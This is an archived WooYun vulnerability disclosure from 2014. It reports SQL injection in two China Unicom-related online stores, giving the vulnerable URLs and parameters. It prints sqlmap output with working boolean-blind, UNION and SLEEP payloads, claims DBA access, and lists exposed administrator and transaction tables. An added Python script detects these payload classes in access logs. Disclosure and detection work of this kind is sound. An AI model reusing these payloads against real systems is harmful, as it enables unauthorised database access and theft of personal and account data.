Source: WooYun (WooYun.org) historical vulnerability archive, http://wy.zone.ci/
2014-03-05: Details reported to the vendor, awaiting vendor handling
2014-03-10: Vendor confirmed; details disclosed to the vendor only
2014-03-20: Details disclosed to core white hats and relevant domain experts
2014-03-30: Details disclosed to regular white hats
2014-04-09: Details disclosed to intern white hats
2014-04-19: Details disclosed to the public
Injection, injection...
Injection points:
1. http://linxi.gov.cn/test.php?id=547 (Xingtai Unicom official online store)
2. http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602 (Shenzhen Unicom online store, publicly disclosed and unfixed)
1. http://linxi.gov.cn/test.php?id=547 (DBA privileges):
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=547 AND 2532=2532

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: id=547 UNION ALL SELECT NULL,CONCAT(0x71767a7371,0x50726c596d6765475973,0x71696d6371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=547 AND SLEEP(5)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
current user is DBA: True
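As an added defender-side example (not part of the original report), the following Python script flags the three payload classes sqlmap identified above (boolean-based blind, UNION, time-based) in combined-format web access logs; the log lines are constructed samples using documentation IP addresses, and the request paths reuse the payload shapes shown in the output.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the report). The query
# strings mirror the three sqlmap payload classes identified above.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Mar/2014:10:00:01 +0800] "GET /test.php?id=547 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Mar/2014:10:00:02 +0800] "GET /test.php?id=547%20AND%202532%3D2532 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Mar/2014:10:00:03 +0800] "GET /test.php?id=547%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x71767a7371,0x50726c596d6765475973,0x71696d6371),NULL,NULL%23 HTTP/1.1" 200 5210
203.0.113.5 - - [05/Mar/2014:10:00:09 +0800] "GET /test.php?id=547%20AND%20SLEEP(5) HTTP/1.1" 200 5120
198.51.100.7 - - [05/Mar/2014:10:00:10 +0800] "GET /test.php?id=12 HTTP/1.1" 200 4800
"""

# One signature per technique shown in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I),   # e.g. AND 2532=2532
    "union query":         re.compile(r"\bunion\s+(all\s+)?select\b", re.I),     # UNION ALL SELECT NULL,...
    "time-based blind":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),        # AND SLEEP(5)
}

# Combined log format: client, ident, user, [timestamp], "METHOD path protocol"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)


def classify_request(path):
    """Return the techniques whose signature appears in the URL-decoded query string."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])   # decode %20, %3D, %23, '+' before matching
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(text):
    """Return (ip, timestamp, path, techniques) for every request that matches a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                      # skip malformed lines rather than crash the scan
        techniques = classify_request(m["path"])
        if techniques:
            hits.append((m["ip"], m["ts"], m["path"], techniques))
    return hits


if __name__ == "__main__":
    for ip, ts, path, techniques in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(techniques)}: {path}")
```

Three of the five constructed lines are flagged, one per technique; a single client stepping through these classes in sequence is the characteristic footprint of an automated injection scan.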
139 tables, covering transaction records and the super-administrator account and password.
Administrator accounts: the xt10010_admin table holds two entries, including a super-administrator account together with its password hash.
2. http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602 (DBA privileges):
current user is DBA: True
24 databases were enumerated.
Transaction information, account information and other sensitive data are exposed (database HUDBS, 262 tables).
You get the idea!
Severity: High
Vulnerability Rank: 14
Confirmed: 2014-03-10 21:05
CNVD confirmed and reproduced the situation described, and has handed the matter to CNCERT, which reported multiple instances to China Unicom Group Corporation for subsequent dispatch to the corresponding provincial companies for handling.
None.